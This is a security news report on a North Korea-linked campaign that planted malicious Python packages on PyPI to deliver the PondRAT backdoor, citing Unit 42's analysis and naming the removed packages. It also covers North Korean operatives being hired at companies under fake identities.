Threat actors with North Korean ties have been detected using compromised Python packages to deliver a newly discovered malware called PondRAT, as part of an ongoing cyber campaign.
According to recent findings by Palo Alto Networks’ Unit 42, PondRAT appears to be a lighter variant of POOLRAT (also known as SIMPLESEA), a macOS backdoor previously linked to the Lazarus Group and used in the 3CX supply chain attack last year.
This activity is part of Operation Dream Job, a long-running campaign where victims are enticed with fake job offers to trick them into downloading malicious software.
“The attackers uploaded multiple infected Python packages to PyPI, a well-known repository for open-source Python code,” stated Yoav Zemah, a Unit 42 researcher, who attributed the activity to the Gleaming Pisces threat actor with moderate confidence.
The adversary, also tracked by the cybersecurity community under names such as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736 (a Lazarus Group sub-cluster), is also notorious for distributing AppleJeus malware.
The goal of these attacks is likely to secure access to supply chain vendors through developers’ systems and ultimately infiltrate the endpoints of those vendors’ customers, as seen in previous incidents.
The list of malicious packages—since removed from PyPI—includes:
- real-ids (893 downloads)
- coloredtxt (381 downloads)
- beautifultext (736 downloads)
- minisound (416 downloads)
The infection process is straightforward: once these packages are downloaded and installed, they trigger the execution of an encoded next-stage payload, which retrieves Linux and macOS versions of the RAT malware from a remote server.
Further investigation into PondRAT has uncovered notable similarities with both POOLRAT and AppleJeus, with the attacks also distributing new Linux versions of POOLRAT.
“The Linux and macOS variants of POOLRAT share an identical function structure for loading configurations, with nearly identical method names and functionalities,” explained Yoav Zemah, a Unit 42 researcher.
He also noted that “the method names between the two versions are strikingly similar, and their strings are almost identical. Additionally, the command-handling mechanism from the command-and-control server is nearly the same.”
PondRAT, a streamlined version of POOLRAT, includes features to upload and download files, pause operations for a set time, and execute arbitrary commands.
Unit 42 further stated that “the discovery of additional Linux variants of POOLRAT indicates that Gleaming Pisces has been expanding its capabilities across both Linux and macOS platforms.”
The use of legitimate-looking Python packages across multiple operating systems presents a significant threat to organizations. Installing such malicious third-party packages can lead to widespread malware infections, compromising entire networks.
This disclosure comes alongside news from KnowBe4, which revealed that a North Korean threat actor had successfully gained employment within the company. More than a dozen other companies have either hired North Korean operatives or have been targeted by fake resumes and applications from North Koreans seeking jobs.
CrowdStrike, tracking this activity under the name Famous Chollima, described it as a “sophisticated, large-scale nation-state operation,” highlighting the serious risk it poses for organizations with remote employees.
Source: TheHackerNews
